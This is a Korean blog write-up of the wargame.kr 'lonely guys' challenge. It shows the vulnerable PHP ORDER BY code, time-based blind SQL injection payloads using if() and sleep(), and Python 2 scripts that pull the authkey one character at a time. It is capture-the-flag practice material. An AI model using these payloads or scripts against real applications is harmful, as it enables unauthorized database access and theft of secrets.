728x90
반응형

lonely guys

 

Blind SQLi challenge.

Can you SQLi with 'order by' in expression?

 

 

 

핵심 부분의 코드만 확인해보자

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
if(isset($_POST['sort'])){
 $sort=$_POST['sort'];
}else{
 $sort="asc";
}
 
mysql_query("update authkey set authkey='".auth_code('lonely guys')."'");
$sort = mysql_real_escape_string($sort);
$result=mysql_query("select * from guys_tbl order by reg_date $sort");
while($row=mysql_fetch_array($result)){
 echo "<tr><td>$row[1]</td><td>$row[2]</td></tr>";
}
?>
 
cs

 

 

POST로 sort값을 받아서 

 

SELECT * FROM guys_tbl ORDER BY reg_date $sort

 

위 쿼리문을 실행한다.

 

 

 

 

 

 

order by 뒤 칼럼명에 서브 쿼리를 넣을 수 있다.

 

order by 칼럼명, 칼럼명, (서브쿼리), ....

 

 

if를 이용해서 time based sql injection을 시도했다.

 

 

flag는 authkey 테이블의 authkey 칼럼에 존재한다.

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import urllib
import urllib2
import sys
import time
 
key = ""
 
def chk(payload):
    url = "http://wargame.kr:8080/lonely_guys/index.php"
 
    opener = urllib2.build_opener(urllib2.HTTPHandler)
    data = {"sort": payload}
    data = urllib.urlencode(data)
    request = urllib2.Request(url, data)
    request.add_header('User-Agent''Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
    data = opener.open(request)
    data = data.read()
 
    print(payload)
    print data
    return data
 
payload = ",if(0<(select length(authkey) from authkey),sleep(1),1)"
chk(payload)
cs

 

참이면 sleep(1), 거짓이면 1을 리턴한다.

 

 

 

,if(40=(select length(authkey) from authkey),sleep(1),1)

authkey의 길이는 40임을 알 수 있다.

 

 

 

 

 

 

이제 한 글자씩 뽑아내면 된다.

 

,if(48=ord((select substr(authkey,1,1) from authkey)),sleep(1),1)

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import urllib
import urllib2
import sys
import time
 
string = "0123456789abcdefghijklmnopqrstuvwxyz"
 
 
key = ""
 
 
def chk(payload):
    url = "http://wargame.kr:8080/lonely_guys/index.php"
 
    opener = urllib2.build_opener(urllib2.HTTPHandler)
    data = {"sort": payload}
    data = urllib.urlencode(data)
    request = urllib2.Request(url, data)
    request.add_header('User-Agent''Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
    data = opener.open(request)
    data = data.read()
 
    print(payload)
    #print data
    return data
 
 
for i in range(40):
    for j in range(len(string)):
        payload = ",if("+str(ord(string[j]))+"=ord((select substr(authkey,"+str(i+1)+",1) from authkey)),sleep(1),1)"
 
        start = time.time()
 
        chk(payload)
 
        end= time.time()-start
 
 
        if end > 1:
            key += string[j]
            print "[*] Find Password!! Password is ["+key+"] "
            break
        else:
            print "[-] Fail!"
 
cs

 

728x90
반응형

+ Recent posts